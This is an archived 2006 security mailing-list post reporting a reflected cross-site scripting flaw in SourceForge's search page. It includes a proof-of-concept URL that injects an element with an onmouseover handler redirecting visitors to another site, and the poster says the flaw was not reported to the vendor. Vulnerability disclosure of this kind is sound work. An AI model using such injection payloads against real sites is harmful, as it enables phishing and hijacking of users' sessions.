<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos

Vulnerability Development: Sourceforge.net XSS

Sourceforge.net XSS

From: <the.spikey_at_gmail.com>
Date: 9 Apr 2006 18:13:31 -0000

('binary' encoding is not supported, stored as-is) Hey guys,
I found this kind of 'hole' in sf.net, you can exucute some code, not all.(i.e. you cannot use a / )
I have not reported this yet, i'm sorry :+

Try it out:

http://sourceforge.net/search/?type_of_search=soft&forum_id=0&group_id=0&atid=0&words=<span style="position: fixed; top: 0px; left: 0px; color: red; width: 1000px; height: 1000px" onmouseOver="javascript:window.location='http://www.google.nl'">&Search=Search

Spiked
www.geekshangout.org
Received on Apr 09 2006

This message: [ Message body ]
Next message: SanjayR: "Old issue- MS NT PPTP/RAS DoS"
Previous message: André Gil: "Re: Delphi and buffer overflows"
Next in thread: v9_at_fakehalo.us: "Re: Sourceforge.net XSS"
Maybe reply: v9_at_fakehalo.us: "Re: Sourceforge.net XSS"
Maybe reply: Juan C Calderon: "Re: Sourceforge.net XSS"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]

edgeos